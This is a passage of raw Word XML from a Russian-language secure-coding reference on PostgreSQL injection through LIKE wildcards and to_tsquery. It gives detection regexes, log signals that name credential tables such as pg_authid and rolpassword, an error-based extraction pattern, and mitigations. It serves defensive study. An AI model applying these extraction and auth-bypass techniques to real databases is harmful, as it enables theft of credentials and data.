        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> followed by f-string или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-concat в аргументах. Regex: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery\s*\([^)]*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery\s*\(\s*f["']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Python f-string).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91922C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(' || (SELECT ...) || ', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в literal-position; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(... || :input)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat между literal и bind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA16378" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery: "&lt;long-string&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;long-string&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит base64-like / hash-like patterns — extracted данные в error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71E95B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text search configuration "&lt;long-string&gt;" does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49121E13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: query parameters с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</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pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — критичные signal-tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5718ACD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: HTTP 500 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>configuration does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в response body — direct leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AAE009" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2007). Error message format </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery: "%s"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не менялся (verbatim в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:t>). Никакие фиксы не закрывают этот класс — error-message-with-input — design feature parser-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E619ABF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A9DA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс error-каналов; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкретный source error message. Граница: 3.2 — CAST-канал; 3.15.4 — tsquery-канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FEEAB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — predecessor: syntax-error на operator-парсинге как entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697EEFD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.3 websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — primary mitigation (no syntax errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C387A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в plpgsql-functions создаёт ту же категорию канале.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79382A98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если concat в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит через основной SQL-string (а не только tsquery-input), это эскалирует в полноценный SQL-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6FF01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Конфиги PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обнаруживает leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31B7E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — error-handler middleware для блокировки leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71682FF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45041E65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «Text Search Functions and Operators» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-textsearch.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EED9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (parser source с errmsg format) — https://github.com/postgres/postgres/blob/master/src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BEB9F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PortSwigger: «Extracting data via verbose error messages» — https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F00979" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «Improper Error Handling» — https://owasp.org/www-community/Improper_Error_Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A84644" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Django Docs: «Error Reporting» (как настроить error-handler чтоб не leak ORM-error) — https://docs.djangoproject.com/en/6.0/howto/error-reporting/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C7A57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   FastAPI Docs: «Handling Errors» / Custom exception handlers — https://fastapi.tiangolo.com/tutorial/handling-errors/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E3B11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари: категория 3.15 LIKE / tsquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCBE63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.15 покрывает injection в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pattern-семантике</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (LIKE wildcards) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operator-language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (tsquery). Четыре подраздела разбирают одну общую идею: bind-параметризация защищает SQL-уровень, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не защищает от семантики самого pattern/operator-языка внутри передаваемой строки</w:t>
      </w:r>
      <w:r>
        <w:t>. Это — отдельный класс injection, который нельзя закрыть тем же приёмом, что обычную SQL-инъекцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620B32E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главный тезис категории: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>escape pattern-символов или переход на функции без operator-parsing — обязательны даже при правильной bind-параметризации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для LIKE — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escape_like_pattern()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESCAPE \\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для FTS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с PG 11+) вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86D608" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Подразделы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CDE784" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.1 % и _ в LIKE без ESCAPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — wildcards </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируются движком LIKE даже при bind. Auth bypass через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, info leak через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-position-matching, DoS через множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без trigram-index. Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escape_like_pattern()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESCAPE '\\'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037A166" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp; | ! &lt;-&gt; :*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — operators tsquery-языка; user-input в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для search-syntax. Boolean override, prefix enumeration через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, syntax-error info leak. Защита: переход на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313795DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.3 websearch_to_tsquery / plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — защитный pattern. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> игнорирует все operators. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PG 11+) поддерживает restricted Google-style syntax без error-channel. Migration с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
